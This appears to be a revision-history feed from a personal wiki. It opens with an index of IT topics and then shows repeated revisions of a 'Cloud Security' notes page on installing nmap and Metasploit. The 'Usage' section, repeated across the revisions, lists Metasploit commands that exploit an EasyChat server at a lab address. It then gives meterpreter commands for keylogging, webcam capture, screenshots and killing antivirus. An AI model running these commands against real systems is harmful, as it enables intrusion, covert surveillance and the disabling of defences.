== [[Continious Integration Tools]]==&lt;br /&gt;
===[[Jenkins]]===&lt;br /&gt;
===[[Azure DevOps]]===&lt;br /&gt;
===[[TeamCity]]===&lt;br /&gt;
===[[Travis CI]]===&lt;br /&gt;
===[[Go CD]]===&lt;br /&gt;
===[[Bamboo]]===&lt;br /&gt;
===[[Git]]===&lt;br /&gt;
====[[GitLab CI]]====&lt;br /&gt;
====[[BitBucket]]====&lt;br /&gt;
====[[SourceTree]]====&lt;br /&gt;
====[[git-flow]]====&lt;br /&gt;
===[[CircleCI]]===&lt;br /&gt;
===[[Codeship]]===&lt;br /&gt;
===[[Codefresh]]===&lt;br /&gt;
&lt;br /&gt;
= [[Containerization &amp;amp; VM Softwares]]=&lt;br /&gt;
== [[Docker]]==&lt;br /&gt;
== [[Kubernetes]]==&lt;br /&gt;
== [[OpenShift]]==&lt;br /&gt;
== [[CoreOS]]==&lt;br /&gt;
== [[Oracle VM VirtualBox Manager]]==&lt;br /&gt;
&lt;br /&gt;
=[[Web Services]]=&lt;br /&gt;
==[[WSDL Documents]]==&lt;br /&gt;
==[[SOAP]]==&lt;br /&gt;
==[[ESB]] - Enterprice Integration Design Pattern==&lt;br /&gt;
===[[Mule ESB]]===&lt;br /&gt;
===[[WSO2 ESB]]===&lt;br /&gt;
&lt;br /&gt;
=[[Database]]=&lt;br /&gt;
==[[ORACLE]]==&lt;br /&gt;
===[[PL/SQL]]===&lt;br /&gt;
===[[TOAD]]===&lt;br /&gt;
===[[PlSql Editor]]===&lt;br /&gt;
===[[SqlPlus]]===&lt;br /&gt;
==[[MySQL]]==&lt;br /&gt;
===[[MySql Front]] - for Windows===&lt;br /&gt;
===[[PhpMyAdmin]] - for Server===&lt;br /&gt;
===[[MySQL WorkBench]]===&lt;br /&gt;
===[[DBeaver]] - for MacOS===&lt;br /&gt;
==[[PostgreSQL]]==&lt;br /&gt;
==[[SQL]]==&lt;br /&gt;
&lt;br /&gt;
=[[NOSQL]]=&lt;br /&gt;
==[[MongoDB and NodeJs]]==&lt;br /&gt;
==[[DynamoDB]]==&lt;br /&gt;
&lt;br /&gt;
=[[AMQP]] - Advanced Message Queuing Protocol=&lt;br /&gt;
== [[RabbitMQ]]==&lt;br /&gt;
== [[Apache Qpid]], an [[open-source software|open-source]] project at the [[Apache Foundation]]==&lt;br /&gt;
== [[Apache ActiveMQ]], an [[open-source software|open-source]] project at the [[Apache Foundation]]==&lt;br /&gt;
== [[JORAM]], a Java [[open-source software|open-source]] implementation from the [[OW2 Consortium]]==&lt;br /&gt;
== [[Apache Qpid]]==&lt;br /&gt;
maintains support for multiple AMQP versions&amp;lt;ref&amp;gt;https://web.archive.org/web/20130914045254/http://qpid.apache.org/releases/qpid-0.22/index.html&amp;lt;/ref&amp;gt;&lt;br /&gt;
== [[StormMQ]]==&lt;br /&gt;
 a hosted [[message queuing service]] using AMQP. It is offered as a commercial [[managed services|managed service]].&lt;br /&gt;
== [[RabbitMQ]]==&lt;br /&gt;
an [[open-source software|open-source]] project sponsored by [[GoPivotal|Pivotal]], primarily supports AMQP 0-9-1, with 1.0 via experimental plugin&lt;br /&gt;
&lt;br /&gt;
= [[MQ]]=&lt;br /&gt;
== [[IBMMQ]]== &lt;br /&gt;
- The IBM MQ Light API is based on the OASIS Standard AMQP Version 1.0 wire protocol.&lt;br /&gt;
== [[Apache Kafka]]==&lt;br /&gt;
== [[RabbitMQ]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=[[Elastic Search]]=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[AWS]]=&lt;br /&gt;
= [[Python]]=&lt;br /&gt;
= [[BlockChain]]=&lt;br /&gt;
== [[BlockChain#Blockchain_Coding|BlockChain Coding]]==&lt;br /&gt;
&lt;br /&gt;
===[[Zero-Knowledge Proofs - Theory]]===&lt;br /&gt;
&lt;br /&gt;
== [[BlockChain#The_top_enterprise_blockchain_platforms|The top enterprise blockchain platforms]]==&lt;br /&gt;
=== [[BlockChain#Ethereum|Ethereum]] ===&lt;br /&gt;
=== [[BlockChain#Hyperledger.28Sawtooth_Lake.29|Hyperledger]] ===&lt;br /&gt;
==== [[Hyperledger Indy]] ====&lt;br /&gt;
=== [[BlockChain#Multichain|Multichain]] ===&lt;br /&gt;
=== [[BlockChain#HydraChain|HydraChain]] ===&lt;br /&gt;
=== [[BlockChain#Open_Chain|Open_Chain]] ===&lt;br /&gt;
=== [[BlockChain#IBM_Bluemix_Blockchain|IBM_Bluemix_Blockchain]] ===&lt;br /&gt;
=== [[BlockChain#Chain|Chain]] ===&lt;br /&gt;
=== [[BlockChain#IOTA|IOTA]] ===&lt;br /&gt;
&lt;br /&gt;
== [[BlockChain#Best_Blockchain_Certification.2C_Training_.26_Course|Best Blockchain Certification, Training &amp;amp; Course]]==&lt;br /&gt;
&lt;br /&gt;
= [[Data Science]] - SAS, R, ETL Tools  etc..=&lt;br /&gt;
== [[R - Quick Guide]]==&lt;br /&gt;
== [[Extract Transform and Load (ETL)]]==&lt;br /&gt;
===[[QuerySurge]]===&lt;br /&gt;
===[[MarkLogic]]===&lt;br /&gt;
===[[Oracle - ORACLE DATA INTEGRATOR]]===&lt;br /&gt;
===[[Amazon RedShift]]===&lt;br /&gt;
===[[Domo]]===&lt;br /&gt;
===[[Teradata]]===&lt;br /&gt;
===[[SAP]]===&lt;br /&gt;
===[[SAS]]===&lt;br /&gt;
===[[IBM – DataStage]]===&lt;br /&gt;
===[[Informatica]]===&lt;br /&gt;
===[[MS SSIS]]===&lt;br /&gt;
===[[Talend Open Studio]]===&lt;br /&gt;
===[[The Ab Initio software]]===&lt;br /&gt;
===[[Dundas]]===&lt;br /&gt;
===[[Sisense]]===&lt;br /&gt;
===[[TabLeau]]===&lt;br /&gt;
===[[MicroStrategy]]===&lt;br /&gt;
===[[Pentaho]]===&lt;br /&gt;
===[[Google BigQuery]]===&lt;br /&gt;
===[[Numetric]]===&lt;br /&gt;
===[[Solver BI360 Suite]]===&lt;br /&gt;
&lt;br /&gt;
= [[Agile/Scrum/Kanban/XP/Waterfall]]=&lt;br /&gt;
==[[Agile Methodology]]==&lt;br /&gt;
==[[Scrum Methodology]]==&lt;br /&gt;
==[[Waterfall Methodology]]==&lt;br /&gt;
==[[Kanban]]==&lt;br /&gt;
==[[Agile vs Scrum]]==&lt;br /&gt;
==[[Kanban vs Scrum]]==&lt;br /&gt;
==[[Agile vs Waterfall]]==&lt;br /&gt;
==[[Kanban vs Agile]]==&lt;br /&gt;
&lt;br /&gt;
=[[Workflow and Decision Automation Platform]]=&lt;br /&gt;
==[[Camunda]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[Business rule management system (BRMS)]] - Drools, OpenRules, Jess etc..=&lt;br /&gt;
==[[Overview]]==&lt;br /&gt;
==[[Related software approaches]]==&lt;br /&gt;
==[[Associated standards]]==&lt;br /&gt;
==[[BRMS Tools]]==&lt;br /&gt;
===[[Open Source Tools]]===&lt;br /&gt;
====[[DROOLS]]====&lt;br /&gt;
====[[OpenRules]]====&lt;br /&gt;
====[[JESS 7]]====&lt;br /&gt;
===[[Strongest Standalone Products]]===&lt;br /&gt;
&lt;br /&gt;
= [[IT Roles]] - DevOps, Product Owner, Scrum Master, ..etc..=&lt;br /&gt;
==[[DevOps]]==&lt;br /&gt;
==[[Scrum Master]]==&lt;br /&gt;
==[[Product Owner]]==&lt;br /&gt;
&lt;br /&gt;
= [[Technology Terms]]=&lt;br /&gt;
== [[Greenfield Project]]==&lt;br /&gt;
&lt;br /&gt;
= [[Operation Systems]]=&lt;br /&gt;
== [[Linux]]==&lt;br /&gt;
== [[Windows]]==&lt;br /&gt;
== [[MacOS]]==&lt;br /&gt;
== [[Terminal Commands]]==&lt;br /&gt;
&lt;br /&gt;
=[[Tokens/Encryptions]]=&lt;br /&gt;
==[[Encryptions]]==&lt;br /&gt;
=== [[JSON Web Tokens (JWT)]]===&lt;br /&gt;
=== [[Simple Web Tokens (SWT)]]===&lt;br /&gt;
=== [[Security Assertion Markup Language Tokens (SAML)]]===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[Others]]&lt;br /&gt;
== [[NGrok]] ==&lt;br /&gt;
== [[BeeCeptor]] ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[Career &amp;amp; Career Coach]]=&lt;br /&gt;
== [[How You Should Answer The 10 Most Common Interview Questions]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== [[Enterprise World]] ==&lt;br /&gt;
===[[ISO/IEC 27001]] - ISO/IEC 27001 is an information security standard, part of the ISO/IEC 27000 family of standards, of which the last version was published in 2013===&lt;br /&gt;
&lt;br /&gt;
==[[EUROPEAN CENTRAL BANK]]==&lt;br /&gt;
===[[T2S - TARGET2-Securities]]===&lt;br /&gt;
===[[MiFID - the Markets in Financial Instruments Directive]]===&lt;br /&gt;
===[[EMIR - the European Market Infrastructure Regulation]]===&lt;br /&gt;
===[[CSDR - the Central Securities Depositories Regulation]]===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[Social Media Marketing &amp;amp; SEO]] = &lt;br /&gt;
== [[SEO]]==&lt;br /&gt;
== [[Instagram]]==&lt;br /&gt;
== [[Facebook]]==&lt;br /&gt;
== [[YouTube]]==&lt;br /&gt;
== [[Twitter]]==&lt;br /&gt;
== [[Others]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[Charity Works]] =&lt;br /&gt;
== [[Angel Investment Networks]] ==&lt;br /&gt;
== [[Set up a charity - GOV.UK]] ==&lt;br /&gt;
&lt;br /&gt;
== Getting started ==&lt;br /&gt;
* [https://en.wikipedia.org/wiki/Help:Wikitext Wikitext]&lt;br /&gt;
* [https://www.mediawiki.org/wiki/Help:Formatting https://www.mediawiki.org/wiki/Help:Formatting]&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1078</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1078"/>
		<updated>2021-01-10T01:29:31Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Usage===&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
$ msf &amp;gt; search easychat&lt;br /&gt;
$ msf &amp;gt; use exploit/windows/http/efs_easychatserver_username&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; show options&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; set RHOST 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; ls&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; sysinfo&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; help&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; screenshot //to take a screenshot of the windows machine, we may use this command&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_start //starts keylogger for the target port. &lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_dump //displays all of the keylogger logs&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; webcam_snap //it runs the webcam and takes a photo of the active user&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; kill xxx // i.e., you can kill a antivirus program&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Vulnerability Scanner=&lt;br /&gt;
==Tools==&lt;br /&gt;
* https://www.tenable.com/products/nessus&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1077</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1077"/>
		<updated>2021-01-10T01:29:08Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Usage===&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
$ msf &amp;gt; search easychat&lt;br /&gt;
$ msf &amp;gt; use exploit/windows/http/efs_easychatserver_username&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; show options&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; set RHOST 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; ls&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; sysinfo&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; help&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; screenshot //to take a screenshot of the windows machine, we may use this command&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_start //starts keylogger for the target port. &lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_dump //displays all of the keylogger logs&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; webcam_snap //it runs the webcam and takes a photo of the active user&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; kill xxx // i.e., you can kill a antivirus program&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Vulnarability Scanner=&lt;br /&gt;
==Tools==&lt;br /&gt;
* https://www.tenable.com/products/nessus&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1076</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1076"/>
		<updated>2021-01-10T01:19:37Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Usage===&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
$ msf &amp;gt; search easychat&lt;br /&gt;
$ msf &amp;gt; use exploit/windows/http/efs_easychatserver_username&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; show options&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; set RHOST 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; ls&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; sysinfo&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; help&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; screenshot //to take a screenshot of the windows machine, we may use this command&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_start //starts keylogger for the target port. &lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_dump //displays all of the keylogger logs&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; webcam_snap //it runs the webcam and takes a photo of the active user&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; kill xxx // i.e., you can kill a antivirus program&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1075</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1075"/>
		<updated>2021-01-10T01:15:47Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
